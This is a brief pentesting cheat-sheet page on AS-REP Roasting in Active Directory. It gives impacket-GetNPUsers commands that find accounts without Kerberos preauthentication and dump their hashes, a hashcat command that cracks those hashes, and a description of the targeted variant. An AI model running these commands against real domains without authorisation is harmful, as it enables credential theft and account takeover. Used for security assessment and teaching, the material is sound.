AS-REP Roasting
AS-REP Roasting
AS-REP Roasting is an attack against a misconfiguration in Kerberos where preauthentication is disabled for a user. Without preauthentication, an attacker can request an AS-REP (Authentication Service Response) from the domain controller for that user. The AS-REP contains data encrypted with the user's password hash, allowing the attacker to perform an offline brute-force attack to crack the hash and potentially obtain the user's password.
This can be done from Kali as well as windows.
Initial Step: Identification
# To identify users with the "Do not require Kerberos preauthentication" option enabled using impacket-GetNPUsers on Kali Linux,
impacket-GetNPUsers <domain>/'<username>':'<password>' -dc-ip <domain-controller-ip>
Type 1: Using Kali Linux:
# Fetch the hash and store it.
impacket-GetNPUsers -dc-ip $DC_IP -request -outputfile hashes.asreproast <domainName>/<Username>:<password>
# We can crack using below command.
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceType 2: Using Windows:
Let's assume that we are conducting an assessment in which we cannot identify any AD users with the account option Do not require Kerberos preauthentication enabled. While enumerating, we notice that we have GenericWrite or GenericAll permissions on another AD user account. Using these permissions, we could reset their passwords, but this would lock out the user from accessing the account. We could also leverage these permissions to modify the User Account Control value of the user to not require Kerberos preauthentication. This attack is known as Targeted AS-REP Roasting. Notably, we should reset the User Account Control value of the user once we've obtained the hash.
Last updated